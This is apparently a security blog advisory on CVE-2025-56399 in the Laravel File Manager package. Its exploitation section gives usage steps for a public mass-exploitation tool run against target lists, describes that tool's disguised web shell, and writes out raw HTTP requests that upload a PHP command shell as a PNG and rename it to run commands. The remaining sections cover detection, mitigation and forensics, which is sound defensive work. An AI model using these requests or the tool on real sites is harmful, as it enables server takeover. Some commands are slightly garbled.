CVE-2025-56399 — Laravel File Manager Unrestricted Upload: Authenticated RCE via Two-Step File Upload + Rename Attack + Video

Listen to this Post

Featured Image

Introduction

A critical vulnerability identified as CVE-2025-56399 has been discovered in the popular `alexusmai/laravel-file-manager` package, affecting versions 3.3.1 and below. This flaw allows an authenticated attacker to achieve Remote Code Execution (RCE) through a sophisticated two-step attack chain: first uploading a malicious file disguised as a harmless PNG image, then leveraging the rename API to change its extension to .php—transforming an innocent-looking image into a fully functional web shell. What makes this vulnerability particularly dangerous is that the upload appears to fail client-side validation, yet the file is still persisted on the server, creating a false sense of security for administrators.

With a CVSS score of 8.5–8.8 (High) and a low attack complexity requiring only low privileges and network access, this vulnerability represents a significant threat to thousands of Laravel applications relying on this file manager package. The attack requires no user interaction and can be executed remotely, making it an attractive target for malicious actors. Security researchers Chayawat Jeamprasertboon, Thanakorn Boontem, and Theethat Thamwasin have been credited with discovering this flaw.

Learning Objectives

  • Understand the technical mechanics behind CVE-2025-56399 and the two-step attack chain
  • Learn how to detect vulnerable Laravel File Manager installations and identify exploitation attempts
  • Master the exploitation process using available Proof-of-Concept (PoC) tools and manual techniques
  • Acquire practical mitigation strategies, including code-level fixes and configuration hardening
  • Develop the ability to conduct security assessments for file upload functionality in web applications

1. Understanding the Vulnerability: The Two-Step Attack Chain

The core weakness behind CVE-2025-56399 lies in improper validation of file types combined with insecure rename functionality. The attack unfolds in a precise sequence that exploits both the upload and rename endpoints of the file manager interface.

Step 1: The Disguised Upload

The attacker, authenticated with low-privilege credentials, navigates to the FileManager interface (typically accessible at /file-manager). They upload a file with a `.png` extension that contains embedded PHP code. The file manager’s client-side validation may reject the upload or display an error message—but crucially, the file is still saved on the server. This happens because the server-side validation either:

  • Fails to validate the actual file content (MIME type / magic bytes)
  • Relies solely on client-side checks that can be bypassed
  • Permits the upload despite validation errors

Step 2: The Rename to RCE

Once the disguised payload is stored on the server, the attacker invokes the rename API endpoint, changing the file extension from `.png` to .php. The server processes this rename operation without validating that the new extension is safe. When the attacker subsequently accesses the file via its public URL (e.g., /storage/malicious.php), the PHP interpreter executes the embedded code, granting the attacker remote code execution capabilities.

Attack Chain Visualization

Authenticate → Access /file-manager → Upload .png with PHP code
↓
File saved server-side (validation bypassed)
↓
Rename API called → .png → .php
↓
Access public URL → PHP executes → RCE achieved

CVSS Metrics Breakdown

| Metric | Value |

|–|-|

| Attack Vector | Network |

| Attack Complexity | Low |

| Privileges Required | Low (Authenticated) |

| User Interaction | None |

| Scope | Unchanged |

| Confidentiality Impact | High |

| Integrity Impact | High |

| Availability Impact | High |

Source: CISA ADP Vulnrichment

2. Exploitation: Using the Public Proof-of-Concept

A publicly available Proof-of-Concept (PoC) tool has been released on GitHub by security researcher Jenderal92, automating the entire exploitation process.

PoC Tool Overview

The tool, `laravel-filemanager-unrestricted-upload`, performs the following automated steps:

  1. Detection — Scans for FileManager endpoints across multiple variants
  2. CSRF Token Extraction — Retrieves anti-CSRF tokens from the target
  3. Initialization — Calls `/file-manager/initialize` to obtain disk configuration
  4. Upload — Uploads a `.htaccess` file (to bypass restrictions) followed by the payload
  5. Verification — Checks if the shell responds to `?shinday=1`

Installation and Usage

Linux / macOS:

 Clone the repository
git clone https://github.com/Jenderal92/laravel-filemanager-unrestricted-upload.git
cd laravel-filemanager-unrestricted-upload

Install Python dependencies
pip install -r requirements.txt

Run the exploit against a list of targets
python2 lfm.py list.txt

Input Format (`list.txt`):

https://target1.com
https://target2.com
http://target3.com

Output:

– `valid.txt` — Contains validated shell URLs
– Access the shell: `https://target.com/storage/shxt_123456.php?shinday=1`

Payload Mechanics

The uploaded PHP web shell is a single-file payload that:

  • Displays system information via `php_uname()`
    – Provides a file upload form for deploying additional tools
  • Responds to the parameter `?shinday=1` with the full shell interface
  • Otherwise outputs a valid `GIF89a` image to evade detection

Manual Exploitation (Without PoC)

For penetration testers who prefer manual exploitation or need to adapt to custom environments:

POST /file-manager/upload HTTP/1.1
Host: target.com
Cookie: [bash]
X-CSRF-TOKEN: [bash]

WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="payload.png"
Content-Type: image/png

<?php system($_GET['cmd']); ?>
WebKitFormBoundary--

Then rename the file:

POST /file-manager/rename HTTP/1.1
Host: target.com
Cookie: [bash]
X-CSRF-TOKEN: [bash]

old_name=payload.png&new_name=payload.php

Finally, execute commands:

GET /storage/payload.php?cmd=id HTTP/1.1
Host: target.com

3. Detection and Identification of Vulnerable Instances

Identifying the Package Version

To determine if your Laravel application is running a vulnerable version of alexusmai/laravel-file-manager:

Via Composer (Linux/Windows/macOS):

composer show alexusmai/laravel-file-manager

Check `composer.lock`:

grep -A 5 "alexusmai/laravel-file-manager" composer.lock

Vulnerable versions: `≤ 3.3.1`

Manual Endpoint Discovery

The FileManager interface may be accessible at various paths:

/file-manager
/file-manager/tinymce
/file-manager/ckeditor
/file-manager/tinymce5
/file-manager/summernote
/admin/file-manager/tinymce

Detection Script (Bash)

!/bin/bash
 Simple detection script for CVE-2025-56399

TARGET="$1"
PATHS=("/file-manager" "/file-manager/tinymce" "/admin/file-manager")

for path in "${PATHS[@]}"; do
RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" "$TARGET$path")
if [ "$RESPONSE" -eq 200 ] || [ "$RESPONSE" -eq 403 ]; then
echo "[+] Potential FileManager endpoint found: $TARGET$path"
fi
done

Log Analysis (Linux)

Search web server logs for suspicious upload and rename patterns:

 Apache
grep -E "POST./(upload|rename)" /var/log/apache2/access.log | grep -E ".(png|php)"

Nginx
grep -E "POST./(upload|rename)" /var/log/nginx/access.log | grep -E ".(png|php)"

IIS (Windows PowerShell)
Select-String -Path "C:\inetpub\logs\LogFiles.log" -Pattern "POST./(upload|rename)"

4. Mitigation and Hardening Strategies

Immediate Actions

1. Upgrade the Package

Currently, no official fixed version has been released for alexusmai/laravel-file-manager. As a temporary measure:

 Consider forking and patching, or switching to an alternative
composer remove alexusmai/laravel-file-manager

2. Implement Server-Side Validation

Add the following validation logic to the file upload controller:

// Laravel Controller Example
public function upload(Request $request)
{
$request->validate([
'file' => 'required|file|mimes:jpg,jpeg,png,gif|max:2048'
]);

$file = $request->file('file');
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mimeType = finfo_file($finfo, $file->getPathname());
finfo_close($finfo);

$allowedMimes = ['image/jpeg', 'image/png', 'image/gif'];
if (!in_array($mimeType, $allowedMimes)) {
return response()->json(['error' => 'Invalid file type'], 400);
}

// Additional: scan for PHP tags in the file content
$content = file_get_contents($file->getPathname());
if (preg_match('/<\?php/i', $content)) {
return response()->json(['error' => 'Suspicious content detected'], 400);
}
}

3. Restrict Rename Operations

Prevent extension changes via the rename API:

// Middleware or controller logic
public function rename(Request $request)
{
$oldName = $request->input('old_name');
$newName = $request->input('new_name');

$oldExtension = pathinfo($oldName, PATHINFO_EXTENSION);
$newExtension = pathinfo($newName, PATHINFO_EXTENSION);

if ($oldExtension !== $newExtension) {
return response()->json(['error' => 'Extension change not permitted'], 403);
}
}

Web Server Configuration

Apache (.htaccess):

 Prevent execution of PHP files in upload directories
<Directory "/path/to/storage">
<FilesMatch "\.(php|phtml|php3|php4|php5|phar)$">
Order Deny,Allow
Deny from all
</FilesMatch>
</Directory>

Nginx:

location /storage/ {
location ~ .(php|phtml|php3|php4|php5|phar)$ {
deny all;
}
}

Windows (IIS) Configuration

<location path="storage">
<system.webServer>
<security>
<requestFiltering>
<fileExtensions>
<add fileExtension=".php" allowed="false" />
<add fileExtension=".phtml" allowed="false" />
</fileExtensions>
</requestFiltering>
</security>
</system.webServer>
</location>

5. Incident Response and Post-Exploitation Analysis

Indicators of Compromise (IoCs)

File System Artifacts:

  • Unexpected `.php` files in storage directories
  • Files with double extensions (e.g., image.png.php)
  • Web shell files responding to specific parameters (e.g., ?shinday=1)

Network Indicators:

  • Unusual POST requests to `/file-manager/upload` and `/file-manager/rename`
    – Requests to `/storage/.php` with query parameters (e.g., ?cmd=)
  • Outbound connections from the web server to external IPs

Forensic Commands (Linux)

 Find recently created PHP files in storage
find /path/to/storage -1ame ".php" -mtime -7 -type f

Check for suspicious PHP files with image extensions
find /path/to/storage -1ame ".png" -exec grep -l "<?php" {} \;

Review rename operations in logs
grep -i "rename" /var/log//access.log | grep -E ".(png|jpg|gif)..php"

Windows PowerShell Commands

 Find recently created PHP files
Get-ChildItem -Path "C:\path\to\storage" -Recurse -Filter ".php" | Where-Object {$_.CreationTime -gt (Get-Date).AddDays(-7)}

Search for PHP code in PNG files
Get-ChildItem -Path "C:\path\to\storage" -Recurse -Filter ".png" | ForEach-Object {
if (Select-String -Path $<em>.FullName -Pattern "<\?php" -Quiet) {
Write-Host "Suspicious: $($</em>.FullName)"
}
}

6. Alternative Solutions and Long-Term Hardening

Package Replacement

Consider migrating to alternative Laravel file manager packages that maintain better security practices:

  • Laravel-FileManager (UniSharp) — Regularly maintained with security patches
  • Spatie Media Library — Robust file handling with built-in security features
  • Custom implementation with strict validation

Security Headers

Implement additional security headers to mitigate exploitation:

// In Laravel middleware
public function handle($request, $next)
{
$response = $next($request);
$response->headers->set('X-Content-Type-Options', 'nosniff');
$response->headers->set('Content-Disposition', 'attachment; filename="file.txt"');
return $response;
}

Content Security Policy (CSP)

 Apache
Header set Content-Security-Policy "default-src 'self'; script-src 'self';"

Regular Security Audits

  • Implement SAST (Static Application Security Testing) tools like PHPStan or Psalm
  • Use DAST (Dynamic Application Security Testing) tools like OWASP ZAP
  • Conduct regular penetration testing of file upload functionality
  • Monitor CVE databases for new vulnerabilities in dependencies

What Undercode Say

  • The two-step attack vector represents a fundamental flaw in how file upload and rename operations are decoupled — the vulnerability exists because the application assumes that validating during upload is sufficient, without considering that rename operations can circumvent those protections. This is a classic case of insecure state management in file handling workflows.

  • Client-side validation creates a dangerous illusion of security — the fact that the upload appears to fail client-side while the file is persisted server-side demonstrates why server-side validation is non-1egotiable. Developers must never trust client-side checks; all validation must be performed on the server with proper MIME type verification using tools like `finfo` in PHP.

  • The rename API is the critical weak point — even if upload validation were perfect, the rename functionality allows attackers to transform safe files into dangerous ones. Restricting extension changes and validating new extensions against a whitelist are essential countermeasures that many implementations overlook.

  • Authentication alone is insufficient protection — this vulnerability requires only low-privilege authentication, meaning that even standard users can execute arbitrary code. Organizations must adopt the principle of least privilege and implement additional authorization checks for sensitive operations like file renaming.

  • The absence of a vendor patch is alarming — as of the time of this writing, no fixed version has been released. Organizations using this package must assume they are vulnerable and implement compensatory controls immediately, rather than waiting for an official update.

  • This vulnerability highlights the broader risks of third-party dependencies — Laravel’s ecosystem is rich with packages that extend functionality, but each dependency introduces potential attack surfaces. Regular dependency audits and automated vulnerability scanning (using tools like Dependabot, Snyk, or Composer’s audit command) should be standard practice.

Prediction

  • +1 — The public disclosure of this vulnerability and the availability of a working PoC will drive rapid adoption of security best practices in the Laravel community, particularly around file upload validation and rename operation security. This incident will likely accelerate the development of security-focused Laravel packages and hardened deployment configurations.

  • -1 — Given that no official patch exists and the PoC is publicly available, widespread exploitation attempts are imminent. Attackers will scan for vulnerable FileManager endpoints and automate exploitation, potentially leading to a surge in compromised Laravel applications over the coming weeks.

  • -1 — The vulnerability’s low attack complexity and low privilege requirements make it particularly dangerous for shared hosting environments where multiple low-privilege users exist. Educational platforms, CMS systems, and enterprise applications using this package are at elevated risk.

  • +1 — Security researchers and the open-source community will likely produce community patches and forks of the package, providing temporary relief for organizations unable to migrate away immediately. This will demonstrate the resilience of the open-source ecosystem in responding to critical vulnerabilities.

  • -1 — The delayed vendor response may erode trust in the `alexusmai/laravel-file-manager` package, prompting organizations to migrate to alternatives and leading to a fragmentation of the Laravel file manager ecosystem. This could create additional security challenges as teams rush to implement replacements without proper vetting.

▶️ Related Video (76% Match):

https://www.youtube.com/watch?v=6mqAEqOvYMo

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Omar Aljabr – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky